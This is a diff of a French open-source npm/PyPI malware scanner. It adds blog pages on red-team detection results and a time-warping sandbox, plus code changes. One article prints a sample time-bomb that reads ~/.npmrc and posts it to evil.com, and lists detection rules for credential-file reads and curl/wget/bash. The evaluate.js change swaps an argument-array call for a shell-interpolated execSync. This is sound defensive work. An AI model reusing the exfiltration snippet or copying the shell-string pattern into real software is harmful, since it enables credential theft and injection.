+      <p>Cette vague a donne naissance au 13eme scanner : <code>ai-config.js</code>, dedie a la detection d'injection de prompts dans les fichiers de configuration d'agents IA.</p>
+
+      <h3>Holdout v1 a v5 — Le test de generalisation (50 echantillons)</h3>
+
+      <p>5 batches de 10 echantillons, chacun cree avec les regles gelees. C'est la mesure de generalisation pure :</p>
+
+      <table>
+        <tr><th>Batch</th><th>Score pre-tuning</th><th>Techniques</th></tr>
+        <tr><td>Holdout v1</td><td><strong>30%</strong> (3/10)</td><td>Charcode reconstruction, proxy getter, stream hijack, workflow inject</td></tr>
+        <tr><td>Holdout v2</td><td><strong>40%</strong> (4/10)</td><td>Env var reconstruction, lifecycle curl, readable stream hijack</td></tr>
+        <tr><td>Holdout v3</td><td><strong>60%</strong> (6/10)</td><td>DNS TXT payload, steganography, reverse shell JS pur, require cache poison</td></tr>
+        <tr><td>Holdout v4</td><td><strong>80%</strong> (8/10)</td><td>Desobfuscation : base64-require, charcode-fetch, hex-array-exec</td></tr>
+        <tr><td>Holdout v5</td><td><strong>50%</strong> (5/10)</td><td>Inter-module : EventEmitter, stream pipeline, class method exfil</td></tr>
+      </table>
+
+      <p>La tendance 30% &rarr; 40% &rarr; 60% &rarr; 80% montre une amelioration constante de la generalisation. La chute a 50% au holdout v5 est attendue : c'etait un scanner entierement nouveau (module-graph) teste pour la premiere fois.</p>
+
+      <h3>Vague 4 — Les 5 bypasses (5 echantillons)</h3>
+
+      <p>Score pre-tuning : <strong>0%</strong>. Les 5 techniques d'evasion les plus vicieuses :</p>
+
+      <table>
+        <tr><th>Technique</th><th>Score pre-fix</th><th>Source</th></tr>
+        <tr><td>Concatenation <code>.gi</code> + <code>t</code> &rarr; <code>.git</code></td><td>3</td><td>SANDWORM_MODE</td></tr>
+        <tr><td>Commandes node-gyp legitimes</td><td>3</td><td>NeoShadow / Aikido</td></tr>
+        <tr><td><code>new Function()</code> sans flag exec</td><td>16</td><td>buildrunner-dev / Veracode</td></tr>
+        <tr><td>Chemin tasks.json via retour fonction</td><td>28</td><td>StegaBin / FAMOUS CHOLLIMA</td></tr>
+        <tr><td>Chemins dynamiques <code>os.homedir()</code></td><td>3</td><td>SANDWORM_MODE</td></tr>
+      </table>
+
+      <p>La correction cle : <code>resolveStringConcat()</code>, une fonction recursive qui resout les <code>BinaryExpression</code> avec operateur <code>+</code>. <code>.gi</code> + <code>t</code> &rarr; <code>.git</code>. Technique d'evasion redoutablement simple mais efficace contre tout pattern matching statique.</p>
+
+      <p>Autre lecon : quand la resolution de chemins AST echoue, la detection par co-occurrence au niveau contenu est un filet de securite efficace. Si un fichier mentionne <code>tasks.json</code> ET <code>runOn</code> ET <code>writeFileSync</code>, c'est suspect independamment de la construction des chemins.</p>
+
+      <h3>Red Team DPRK — Techniques nord-coreennes (10 echantillons)</h3>
+
+      <p>10 echantillons simulant les techniques observees dans les campagnes Lazarus/APT38 :</p>
+      <ul>
+        <li><strong>5 echantillons pure API multi-fichiers</strong> — exfiltration repartie sur plusieurs modules avec imports locaux</li>
+        <li><strong>5 echantillons evasion eval</strong> — eval factory, <code>.call.call(eval)</code>, <code>require(/regex/.source)</code>, charcode arithmetique, object-method-alias</li>
+      </ul>
+
+      <p>Cette campagne a donne naissance au graphe d'intention (analyse de coherence source-sink intra-fichier) et a 8 nouvelles regles.</p>
+
+      <h3>Red Team v7 — Derniere campagne (corrections)</h3>
+
+      <p>3 corrections de faux positifs sur les nouvelles regles + 3 quick wins ameliorant la detection sur des cas limites. Alignement final des metriques pour le benchmark Datadog.</p>
+
+      <h2>Resultats finaux</h2>
+
+      <table>
+        <tr><th>Metrique</th><th>Valeur</th></tr>
+        <tr><td>Echantillons adversariaux</td><td><strong>67</strong></td></tr>
+        <tr><td>Holdouts</td><td><strong>40</strong></td></tr>
+        <tr><td>Total</td><td><strong>107</strong></td></tr>
+        <tr><td>ADR (score &ge; 20)</td><td><strong>96.3%</strong> (103/107)</td></tr>
+        <tr><td>Misses documentes</td><td>4 (limites acceptees)</td></tr>
+      </table>
+
+      <h2>Sources des techniques</h2>
+
+      <p>Toutes les techniques sont basees sur des attaques reelles documentees :</p>
+      <ul>
+        <li><strong>Snyk</strong> : ToxicSkills, s1ngularity, Clinejection</li>
+        <li><strong>Sonatype</strong> : PhantomRaven (zero-deps dropper)</li>
+        <li><strong>Datadog Security Labs</strong> : Shai-Hulud 2.0 (workflow injection)</li>
+        <li><strong>Unit 42</strong> : Shai-Hulud (credential exfil, dead man's switch)</li>
+        <li><strong>Check Point</strong> : Shai-Hulud 2.0 (Discord webhook exfil)</li>
+        <li><strong>StepSecurity</strong> : s1ngularity (AI agent abuse)</li>
+        <li><strong>Socket.dev</strong> : Mid-year supply chain report 2025</li>
+        <li><strong>Sygnia</strong> : chalk/debug sept 2025 (prototype hooking)</li>
+      </ul>
+
+      <h2>Lecon</h2>
+
+      <p>Le score pre-tuning est la seule metrique honnete de generalisation. Le score post-tuning (100%) est tautologique — on a corrige ce qu'on savait casse. La progression 14% &rarr; 0% &rarr; 60% &rarr; 30% &rarr; 40% &rarr; 60% &rarr; 80% &rarr; 50% montre les oscillations reelles : chaque nouveau type de technique revele des angles morts, meme quand les corrections precedentes ont ameliore la couverture generale.</p>
+
+      <p>L'ADR de 96.3% signifie que 4 echantillons passent encore a travers. Et c'est normal — un attaquant suffisamment motive trouvera toujours une technique non couverte. L'objectif n'est pas 100%, c'est de rendre l'evasion <em>couteuse</em>.</p>
+
+    </div>
+  </article>
+</main>
+
+<footer>
+  MUAD'DIB / DNSZLSK / <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">source</a>
+</footer>
+
+</body>
+</html>

--- a/docs/blog/sandbox-time-travel.html
+++ b/docs/blog/sandbox-time-travel.html
@@ -1,0 +1,186 @@
+<!DOCTYPE html>
+<html lang="fr">
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>Le sandbox qui voyage dans le temps — MUAD'DIB</title>
+  <meta name="description" content="Monkey-patching des APIs de temps pour detecter les malwares qui attendent 72h avant de voler des credentials.">
+  <link rel="stylesheet" href="../style.css">
+  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/github-dark.min.css">
+  <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
+  <script>hljs.highlightAll();</script>
+</head>
+<body>
+
+<nav>
+  <a href="../" class="site-name">muad-dib</a>
+  <a href="../">accueil</a>
+  <a href="./">blog</a>
+  <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">github</a>
+  <a href="https://www.npmjs.com/package/muaddib-scanner" target="_blank" rel="noopener">npm</a>
+</nav>
+
+<main>
+  <a href="./" class="back-link">&larr; Blog</a>
+
+  <article>
+    <div class="article-meta">
+      <h1>Le sandbox qui voyage dans le temps</h1>
+      <span class="date">2026-03-02</span>
+      <div class="tags">
+        <span class="tag">sandbox</span>
+        <span class="tag">time-bomb</span>
+        <span class="tag">evasion</span>
+      </div>
+    </div>
+
+    <div class="article-content">
+
+      <p>MITRE ATT&CK T1497.003 — Time Based Evasion Checks — est dans le top 10 des techniques d'evasion en 2026. L'idee est simple : le malware attend 72 heures avant de voler les credentials. Le sandbox Docker a un timeout de 120 secondes. Le payload ne s'execute jamais pendant l'analyse.</p>
+
+      <p>La solution : on accelere le temps.</p>
+
+      <h2>Le probleme</h2>
+
+      <p>Un malware classique fait ceci :</p>
+
+      <pre><code class="language-javascript">// Attendre 3 jours apres l'installation
+setTimeout(() => {
+  const token = fs.readFileSync(
+    path.join(os.homedir(), '.npmrc'), 'utf8'
+  );
+  fetch('https://evil.com/collect', {
+    method: 'POST',
+    body: token
+  });
+}, 72 * 3600 * 1000);  // 72 heures</code></pre>
+
+      <p>Le sandbox execute le package pendant 120 secondes. Le <code>setTimeout</code> de 72h ne se declenche jamais. Le sandbox conclut : aucun comportement suspect. Package clean.</p>
+
+      <p>C'est exactement ce que les attaquants veulent.</p>
+
+      <h2>La solution : monkey-patching via preload</h2>
+
+      <p>Le container Docker injecte un script preload via <code>NODE_OPTIONS=--require /opt/preload.js</code>. Ce script patche toutes les APIs de temps <strong>avant</strong> que le code du package s'execute :</p>
+
+      <pre><code class="language-javascript">// Sauvegarder les originaux dans une closure inaccessible
+const _origDateNow = Date.now;
+const _origSetTimeout = setTimeout;
+const _origSetInterval = setInterval;
+
+// Offset de temps (configurable par run)
+let timeOffset = 0;  // Run 1: 0h, Run 2: +72h, Run 3: +7j
+
+// Patcher Date.now() et new Date()
+Date.now = () => _origDateNow.call(Date) + timeOffset;
+const _OrigDate = Date;
+globalThis.Date = function(...args) {
+  if (args.length === 0) return new _OrigDate(_origDateNow() + timeOffset);
+  return new _OrigDate(...args);
+};
+
+// Accelerer les timers
+globalThis.setTimeout = (fn, delay, ...args) => {
+  if (delay > 3600000) {  // > 1h
+    log({ type: 'suspicious_timer', delay });
+    return _origSetTimeout(fn, 0, ...args);  // Execution immediate
+  }
+  return _origSetTimeout(fn, delay, ...args);
+};</code></pre>
+
+      <p>Les APIs patchees de maniere coherente :</p>
+      <ul>
+        <li><code>Date.now()</code> — retourne le temps reel + offset</li>
+        <li><code>new Date()</code> sans argument — date decalee</li>
+        <li><code>performance.now()</code>, <code>process.hrtime()</code>, <code>process.uptime()</code> — tous synchronises</li>
+        <li><code>setTimeout(fn, 72h)</code> &rarr; <code>setTimeout(fn, 0)</code> — execution immediate</li>
+        <li><code>setInterval(fn, delay)</code> &rarr; premiere execution immediate</li>
+      </ul>
+
+      <h2>Multi-run : 3 points dans le temps</h2>
+
+      <p>Un seul offset ne suffit pas. Certains malwares attendent 3 jours, d'autres 1 semaine, d'autres verifient la date de premiere installation. Le sandbox execute le package <strong>3 fois</strong> :</p>
+
+      <table>
+        <tr><th>Run</th><th>Offset</th><th>Cible</th></tr>
+        <tr><td>Run 1</td><td>0h</td><td>Baseline — comportement immediat</td></tr>
+        <tr><td>Run 2</td><td>+72h</td><td>Time-bombs 3 jours</td></tr>
+        <tr><td>Run 3</td><td>+7 jours</td><td>Time-bombs 1 semaine</td></tr>
+      </table>
+
+      <p>Sortie anticipee si le score depasse 80 (CRITICAL detecte). Le meilleur score des 3 runs est retenu.</p>
+
+      <h2>Interception des APIs sensibles</h2>
+
+      <p>En plus de l'acceleration du temps, le preload intercepte toutes les APIs sensibles pour logging comportemental :</p>
+
+      <ul>
+        <li><strong>Reseau</strong> : <code>http.request</code>, <code>https.request</code>, <code>fetch</code>, <code>dns.resolve</code>, <code>net.connect</code></li>
+        <li><strong>Fichiers</strong> : <code>readFileSync</code>/<code>writeFileSync</code> avec detection de chemins sensibles (<code>.npmrc</code>, <code>.ssh</code>, <code>.aws</code>)</li>
+        <li><strong>Processus</strong> : <code>exec</code>/<code>spawn</code> avec detection de commandes dangereuses (<code>curl</code>, <code>wget</code>, <code>bash</code>)</li>
+        <li><strong>Environnement</strong> : Proxy sur <code>process.env</code> pour logger l'acces aux variables TOKEN/SECRET/KEY</li>
+      </ul>
+
+      <p>Tout est ecrit dans <code>/tmp/preload.log</code> en JSON structuree, puis analyse par <code>src/sandbox/analyzer.js</code>.</p>
+
+      <h2>6 nouvelles regles de detection</h2>
+
+      <table>
+        <tr><th>Regle</th><th>Severite</th><th>Pattern</th></tr>
+        <tr><td>Timer delay &gt; 1h</td><td>MEDIUM</td><td><code>setTimeout</code> avec delai suspicieux</td></tr>
+        <tr><td>Timer delay &gt; 24h</td><td>CRITICAL</td><td>Time-bomb probable</td></tr>
+        <tr><td>Lecture fichier sensible</td><td>HIGH</td><td>.npmrc, .ssh, .aws, .env via preload</td></tr>
+        <tr><td>Reseau apres lecture sensible</td><td>CRITICAL</td><td>Compose : file read + network = exfiltration</td></tr>
+        <tr><td>Execution commande dangereuse</td><td>HIGH</td><td>curl, wget, bash, powershell via preload</td></tr>
+        <tr><td>Acces env sensible</td><td>MEDIUM</td><td>TOKEN, SECRET, KEY, PASSWORD</td></tr>
+      </table>
+
+      <p>La regle composite "reseau apres lecture sensible" est la plus puissante. Elle detecte la sequence exacte d'exfiltration : lire un fichier de credentials, puis envoyer les donnees sur le reseau. Score : +40 points — suffisant pour declencher l'alerte a lui seul.</p>
+
+      <h2>Canary tokens : les honeypots</h2>
+
+      <p>Le sandbox injecte 6 faux secrets dans l'environnement :</p>
+
+      <pre><code class="language-bash">GITHUB_TOKEN=ghp_canary_xxxxxxxxxxxx
+NPM_TOKEN=npm_canary_xxxxxxxxxxxx
+AWS_ACCESS_KEY_ID=AKIA_canary_xxxxxxx
+AWS_SECRET_ACCESS_KEY=canary_xxxxxxx
+SLACK_WEBHOOK_URL=https://hooks.slack.com/canary
+DISCORD_WEBHOOK_URL=https://discord.com/api/webhooks/canary</code></pre>
+
+      <p>Si le package tente d'exfiltrer ces tokens via HTTP, DNS, ou stdout, c'est la preuve directe de malveillance. L'exfiltration est recherchee dans 7 vecteurs : corps HTTP, requetes DNS, URLs HTTP, connexions TLS, modifications filesystem, commandes processus, et sortie d'installation.</p>
+
+      <h2>Securite du preload</h2>
+
+      <ul>
+        <li>Tout est encapsule dans une IIFE — le package cible ne peut pas acceder aux references originales</li>
+        <li>Chaque patch est protege par <code>try/catch</code> — le preload ne peut jamais casser le package analyse</li>
+        <li><code>NODE_OPTIONS</code> est verrouille via <code>Object.defineProperty</code> apres injection — empeche le bypass dans les processus enfants</li>
+        <li>L'injection est differee au point d'entree du package, pas pendant <code>npm install</code> — evite d'intercepter les appels reseau de npm lui-meme</li>
+      </ul>
+
+      <h2>Resultats</h2>
+
+      <table>
+        <tr><th>Metrique</th><th>Avant</th><th>Apres</th></tr>
+        <tr><td>Regles sandbox</td><td>8</td><td><strong>14</strong> (+6)</td></tr>
+        <tr><td>Tests</td><td>1471</td><td><strong>1522</strong> (+51)</td></tr>
+        <tr><td>Detection time-bombs</td><td>impossible</td><td><strong>3 points dans le temps</strong></td></tr>
+      </table>
+
+      <h2>Lecon</h2>
+
+      <p>Les malwares modernes ne s'executent pas immediatement. Ils attendent que le scanner ait fini son analyse, que l'environnement CI/CD soit passe, que l'attention du developpeur se soit relachee. L'acceleration du temps dans le sandbox transforme un <code>setTimeout(fn, 72h)</code> en <code>setTimeout(fn, 0)</code> — le malware croit que 3 jours se sont ecoules, et declenche son payload pendant l'analyse.</p>
+
+      <p>Le monkey-patching coherent est essentiel. Si <code>Date.now()</code> dit +72h mais que <code>process.uptime()</code> dit 2 secondes, un malware sophistique detecte l'inconsistance. Toutes les APIs de temps doivent raconter la meme histoire.</p>
+
+    </div>
+  </article>
+</main>
+
+<footer>
+  MUAD'DIB / DNSZLSK / <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">source</a>
+</footer>
+
+</body>
+</html>

--- a/docs/index.html
+++ b/docs/index.html
@@ -1,0 +1,69 @@
+<!DOCTYPE html>
+<html lang="fr">
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>MUAD'DIB</title>
+  <meta name="description" content="Scanner open source de menaces supply-chain pour npm et PyPI.">
+  <link rel="stylesheet" href="style.css">
+</head>
+<body>
+
+<nav>
+  <a href="./" class="site-name">muad-dib</a>
+  <a href="./" class="active">accueil</a>
+  <a href="./blog/">blog</a>
+  <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">github</a>
+  <a href="https://www.npmjs.com/package/muaddib-scanner" target="_blank" rel="noopener">npm</a>
+</nav>
+
+<h1>MUAD'DIB</h1>
+<p><span class="version">v2.9.9</span></p>
+<p>Scanner de menaces supply-chain pour npm et PyPI. Open source, zero cloud, une seule commande.</p>
+
+<div class="install">
+  <span class="prompt">$ </span>npm install -g muaddib-scanner
+</div>
+
+<p>MUAD'DIB analyse les packages npm et PyPI pour detecter les malwares, les backdoors et les tentatives d'exfiltration de credentials. 14 scanners paralleles, 225 000+ IOC, sandbox Docker avec time-warp, moniteur temps reel sur le flux npm.</p>
+
+<hr>
+
+<div class="metrics">
+  <span class="metric"><span class="value">93.9%</span> <span class="label">TPR</span></span>
+  <span class="metric"><span class="value">12.9%</span> <span class="label">FPR</span></span>
+  <span class="metric"><span class="value">96.3%</span> <span class="label">ADR</span></span>
+  <span class="metric"><span class="value">92.5%</span> <span class="label">Wild TPR (17K)</span></span>
+  <span class="metric"><span class="value">2435</span> <span class="label">tests</span></span>
+  <span class="metric"><span class="value">153</span> <span class="label">regles</span></span>
+</div>
+
+<hr>
+
+<h2>Fonctionnalites</h2>
+<ul>
+  <li><strong>14 scanners paralleles</strong> : AST, dataflow, obfuscation, entropie, typosquat, shell, module-graph, intent-graph</li>
+  <li><strong>Sandbox Docker</strong> : monkey-patching time-warp, multi-run [0h, 72h, 7j], canary tokens</li>
+  <li><strong>Moniteur temps reel</strong> : flux CouchDB npm, alertes Discord</li>
+  <li><strong>Desobfuscation statique</strong> : charcode, base64, hex arrays, const propagation</li>
+  <li><strong>Diff entre versions</strong> : <code>muaddib diff v1.2.0</code></li>
+  <li><strong>Detection comportementale</strong> : anomalies lifecycle, AST diff temporel, changement de maintainer</li>
+  <li><strong>Compound scoring</strong> : co-occurrences zero-FP</li>
+  <li><strong>225 000+ IOC</strong> npm + 14 000+ PyPI, format compact 5MB</li>
+</ul>
+
+<hr>
+
+<div class="links-row">
+  <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">GitHub</a>
+  <a href="https://www.npmjs.com/package/muaddib-scanner" target="_blank" rel="noopener">npm</a>
+  <a href="https://marketplace.visualstudio.com/items?itemName=dnszlsk.muaddib-vscode" target="_blank" rel="noopener">VS Code</a>
+  <a href="./blog/">Blog</a>
+</div>
+
+<footer>
+  MUAD'DIB / DNSZLSK / <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">source</a>
+</footer>
+
+</body>
+</html>

--- a/docs/style.css
+++ b/docs/style.css
@@ -1,0 +1,124 @@
+/* MUAD'DIB */
+
+*, *::before, *::after { box-sizing: border-box; margin: 0; padding: 0; }
+
+body {
+  font-family: Georgia, "Times New Roman", serif;
+  background: #111;
+  color: #999;
+  line-height: 1.7;
+  max-width: 1000px;
+  margin: 0 auto;
+  padding: 1.5rem 2rem;
+  font-size: 15px;
+}
+
+a { color: #6a9fb5; text-decoration: none; }
+a:hover { text-decoration: underline; }
+
+/* Nav */
+nav { margin-bottom: 1.5rem; padding-bottom: 0.8rem; border-bottom: 1px solid #1a1a1a; font-family: Consolas, monospace; font-size: 13px; }
+nav a { text-decoration: none; margin-right: 1rem; color: #555; }
+nav a:hover { color: #888; }
+nav a.active { color: #888; }
+nav .site-name { color: #ccc; font-weight: normal; }
+
+/* Headings */
+h1 { font-size: 1.4rem; font-weight: normal; margin-bottom: 0.4rem; color: #ddd; font-family: Georgia, serif; }
+h2 { font-size: 1.1rem; font-weight: bold; margin: 2rem 0 0.4rem; color: #ccc; }
+h3 { font-size: 1rem; font-weight: bold; margin: 1.3rem 0 0.3rem; color: #bbb; }
+
+p { margin-bottom: 0.8rem; }
+hr { border: none; border-top: 1px solid #1a1a1a; margin: 1.2rem 0; }
+
+strong { color: #ccc; font-weight: bold; }
+em { color: #999; }
+
+/* Lists */
+ul, ol { margin: 0.4rem 0 0.8rem 1.3rem; }
+li { margin-bottom: 0.2rem; }
+
+/* Code */
+code {
+  font-family: Consolas, "Liberation Mono", monospace;
+  font-size: 13px;
+  color: #8a8a6a;
+}
+
+pre {
+  background: #0e0e0e;
+  padding: 0.8rem;
+  margin: 0.8rem 0;
+  overflow-x: auto;
+  line-height: 1.45;
+  font-size: 13px;
+  border-left: 2px solid #222;
+}
+
+pre code { color: #8a8a6a; }
+
+/* Tables */
+table { width: 100%; border-collapse: collapse; margin: 0.8rem 0; font-size: 13px; }
+th, td { padding: 0.3rem 0.5rem; text-align: left; border-bottom: 1px solid #1a1a1a; }
+th { color: #666; font-weight: normal; text-transform: uppercase; font-size: 11px; letter-spacing: 0.05em; font-family: Consolas, monospace; }
+
+/* Blockquote */
+blockquote {
+  border-left: 1px solid #333;
+  padding-left: 0.8rem;
+  margin: 0.8rem 0;
+  color: #777;
+  font-style: italic;
+}
+
+/* Tags */
+.tags { margin: 0.2rem 0 0.3rem; font-family: Consolas, monospace; }
+.tag { display: inline; font-size: 12px; color: #555; }
+.tag::before { content: "#"; }
+.tag + .tag { margin-left: 0.3rem; }
+
+/* Home */
+.version { font-family: Consolas, monospace; font-size: 12px; color: #555; }
+
+.install {
+  font-family: Consolas, monospace;
+  font-size: 13px;
+  padding: 0.4rem 0;
+  margin: 0.6rem 0;
+  color: #8a8a6a;
+}
+
+.install .prompt { color: #444; user-select: none; }
+
+.metrics { margin: 0.8rem 0; font-family: Consolas, monospace; font-size: 13px; }
+.metric { display: inline-block; margin-right: 1.2rem; margin-bottom: 0.3rem; }
+.metric .value { color: #ccc; }
+.metric .label { color: #555; font-size: 11px; }
+
+.links-row { margin: 1rem 0; font-size: 14px; }
+.links-row a { margin-right: 1rem; }
+
+/* Blog list */
+.post-list { list-style: none; padding: 0; margin: 0; }
+.post-list li { padding: 0.5rem 0; }
+.post-date { font-size: 12px; color: #444; font-family: Consolas, monospace; }
+.post-title { font-weight: normal; font-size: 15px; }
+.post-title a { color: #ccc; text-decoration: none; }
+.post-title a:hover { color: #6a9fb5; }
+.post-summary { color: #666; font-size: 14px; margin-top: 0.15rem; }
+
+/* Article */
+.article-meta { margin-bottom: 1rem; }
+.article-meta .date { font-size: 12px; color: #444; font-family: Consolas, monospace; }
+
+.back-link { font-size: 13px; color: #555; display: inline-block; margin-bottom: 0.8rem; text-decoration: none; font-family: Consolas, monospace; }
+.back-link:hover { color: #888; }
+
+/* Footer */
+footer { margin-top: 2rem; padding-top: 0.6rem; border-top: 1px solid #1a1a1a; font-size: 12px; color: #333; font-family: Consolas, monospace; }
+footer a { color: #333; }
+footer a:hover { color: #555; }
+
+@media (max-width: 600px) {
+  body { padding: 1rem; }
+}

--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.9.8",
+  "version": "2.9.10",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.9.8",
+      "version": "2.9.10",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.3.2",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.9.9",
+  "version": "2.9.10",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/commands/evaluate.js
+++ b/src/commands/evaluate.js
@@ -37,6 +37,9 @@ const BENIGN_THRESHOLD = 20;
 const ADR_THRESHOLD = 20;  // v2.6.5: global threshold (aligned with BENIGN_THRESHOLD, no per-sample overfitting)
 const PACK_TIMEOUT_MS = 30000;
 
+// Validate npm package name to prevent shell injection (names come from our own datasets)
+const SAFE_PKG_RE = /^(@[\w._-]+\/)?[\w._-]+$/;
+
 // =========================================================================
 // Scan result cache — avoids re-scanning when src/ hasn't changed
 // =========================================================================
@@ -348,7 +351,8 @@ function downloadAndExtract(pkg, options = {}) {
 
   let tgzFilename;
   try {
-    const output = execFileSync('npm', ['pack', pkg], {
+    if (!SAFE_PKG_RE.test(pkg)) throw new Error('invalid package name');
+    const output = execSync(`npm pack ${pkg}`, {
       cwd: pkgCacheDir,
       encoding: 'utf8',
       timeout: PACK_TIMEOUT_MS,
@@ -697,7 +701,8 @@ async function evaluateBenignRandom(options = {}) {
       fs.mkdirSync(pkgCacheDir, { recursive: true });
       let tgzFilename;
       try {
-        tgzFilename = execFileSync('npm', ['pack', pkg], {
+        if (!SAFE_PKG_RE.test(pkg)) throw new Error('invalid package name');
+        tgzFilename = execSync(`npm pack ${pkg}`, {
           cwd: pkgCacheDir,
           encoding: 'utf8',
           timeout: PACK_TIMEOUT_MS,

--- a/src/ioc/scraper.js
+++ b/src/ioc/scraper.js
@@ -528,22 +528,29 @@ async function scrapeShaiHuludDetector() {
       for (const pkg of pkgList) {
         const versions = pkg.affectedVersions || [];
         if (versions.length === 0) continue; // Skip packages with no version info — avoids false wildcard
-        for (const ver of versions) {
-          packages.push({
-            id: `SHAI-HULUD-${pkg.name}-${ver}`,
-            name: pkg.name,
-            version: ver,
-            severity: pkg.severity || 'critical',
-            confidence: 'high',
-            source: 'shai-hulud-detector',
-            description: 'Compromised by Shai-Hulud 2.0 supply chain attack',
-            references: ['https://github.com/gensecaihq/Shai-Hulud-2.0-Detector'],
-            mitre: 'T1195.002',
-            freshness: createFreshness('gensecai', 'high')
-          });
+        for (const rawVer of versions) {
+          // Sanitize: split comma-separated version strings (e.g. "4.18.1, 5.11.3")
+          const splitVersions = rawVer && rawVer.includes(',')
+            ? rawVer.split(',').map(v => v.trim()).filter(Boolean)
+            : [rawVer];
+          for (const ver of splitVersions) {
+            if (!ver) continue;
+            packages.push({
+              id: `SHAI-HULUD-${pkg.name}-${ver}`,
+              name: pkg.name,
+              version: ver,
+              severity: pkg.severity || 'critical',
+              confidence: 'high',
+              source: 'shai-hulud-detector',
+              description: 'Compromised by Shai-Hulud 2.0 supply chain attack',
+              references: ['https://github.com/gensecaihq/Shai-Hulud-2.0-Detector'],
+              mitre: 'T1195.002',
+              freshness: createFreshness('gensecai', 'high')
+            });
+          }
         }
       }
-      
+
       // Extract hashes
       if (data.indicators && data.indicators.fileHashes) {
         const fileHashes = data.indicators.fileHashes;
@@ -1186,8 +1193,21 @@ async function runScraper() {
   dedupSpinner.start('Deduplicating ' + allPackages.length + ' npm + ' + pypiPackages.length + ' PyPI entries...');
   const dedupMap = new Map();
 
-  // Seed with existing IOCs
+  // Seed with existing IOCs (with sanitization of stale comma-in-version entries)
   for (const pkg of existingIOCs.packages) {
+    // Split comma-separated version strings into individual entries
+    if (pkg.version && pkg.version.includes(',')) {
+      const parts = pkg.version.split(',').map(v => v.trim()).filter(Boolean);
+      for (const v of parts) {
+        const key = pkg.name + '@' + v;
+        if (!dedupMap.has(key)) {
+          dedupMap.set(key, Object.assign({}, pkg, { version: v }));
+        }
+      }
+      continue;
+    }
+    // Skip wildcard entries for NEVER_WILDCARD packages in existing data
+    if (pkg.version === '*' && NEVER_WILDCARD.has(pkg.name)) continue;
     const key = pkg.name + '@' + pkg.version;
     dedupMap.set(key, pkg);
   }

--- a/src/ioc/updater.js
+++ b/src/ioc/updater.js
@@ -278,8 +278,25 @@ function createOptimizedIOCs(iocs) {
   const wildcardPackages = new Set();
 
   for (const pkg of iocs.packages) {
+    // Sanitize: split comma-separated version strings into individual entries
+    if (pkg.version && pkg.version.includes(',')) {
+      const versions = pkg.version.split(',').map(v => v.trim()).filter(Boolean);
+      for (const ver of versions) {
+        const entry = Object.assign({}, pkg, { version: ver });
+        if (ver === '*' && !NEVER_WILDCARD.has(pkg.name)) {
+          wildcardPackages.add(pkg.name);
+        }
+        if (!packagesMap.has(pkg.name)) packagesMap.set(pkg.name, []);
+        packagesMap.get(pkg.name).push(entry);
+      }
+      continue;
+    }
+
     if (pkg.version === '*') {
-      wildcardPackages.add(pkg.name);
+      // Defense-in-depth: NEVER_WILDCARD packages must not be wildcarded
+      if (!NEVER_WILDCARD.has(pkg.name)) {
+        wildcardPackages.add(pkg.name);
+      }
     }
 
     if (!packagesMap.has(pkg.name)) {
@@ -293,6 +310,18 @@ function createOptimizedIOCs(iocs) {
   const pypiWildcardPackages = new Set();
 
   for (const pkg of iocs.pypi_packages || []) {
+    // Sanitize: split comma-separated version strings
+    if (pkg.version && pkg.version.includes(',')) {
+      const versions = pkg.version.split(',').map(v => v.trim()).filter(Boolean);
+      for (const ver of versions) {
+        const entry = Object.assign({}, pkg, { version: ver });
+        if (ver === '*') pypiWildcardPackages.add(pkg.name);
+        if (!pypiPackagesMap.has(pkg.name)) pypiPackagesMap.set(pkg.name, []);
+        pypiPackagesMap.get(pkg.name).push(entry);
+      }
+      continue;
+    }
+
     if (pkg.version === '*') {
       pypiWildcardPackages.add(pkg.name);
     }
@@ -369,7 +398,15 @@ function generateCompactIOCs(fullIOCs) {
       wildcards.push(p.name);
     } else {
       if (!versioned[p.name]) versioned[p.name] = [];
-      versioned[p.name].push(p.version);
+      // Sanitize: split comma-separated version strings into individual entries
+      if (p.version && p.version.includes(',')) {
+        const parts = p.version.split(',').map(v => v.trim()).filter(Boolean);
+        for (const v of parts) {
+          if (!versioned[p.name].includes(v)) versioned[p.name].push(v);
+        }
+      } else {
+        versioned[p.name].push(p.version);
+      }
     }
   }
 
@@ -417,10 +454,11 @@ function expandCompactIOCs(compact) {
   const defaultSev = compact.defaultSeverity || 'critical';
   const overrides = compact.severityOverrides || {};
 
-  // Expand npm wildcards (deduplicate via Set)
+  // Expand npm wildcards (deduplicate via Set, enforce NEVER_WILDCARD)
   const seenWildcards = new Set();
   for (const name of compact.wildcards || []) {
     if (seenWildcards.has(name)) continue;
+    if (NEVER_WILDCARD.has(name)) continue; // Defense-in-depth: skip wildcards for legitimate packages
     seenWildcards.add(name);
     const severity = (overrides[name] && overrides[name]['*']) || defaultSev;
     packages.push({ name: name, version: '*', severity: severity });
@@ -429,8 +467,17 @@ function expandCompactIOCs(compact) {
   // Expand npm versioned
   for (const name of Object.keys(compact.versioned || {})) {
     for (const version of compact.versioned[name]) {
-      const severity = (overrides[name] && overrides[name][version]) || defaultSev;
-      packages.push({ name: name, version: version, severity: severity });
+      // Sanitize: split comma-separated version strings into individual entries
+      if (version && version.includes(',')) {
+        const parts = version.split(',').map(function(v) { return v.trim(); }).filter(Boolean);
+        for (const v of parts) {
+          const severity = (overrides[name] && overrides[name][v]) || defaultSev;
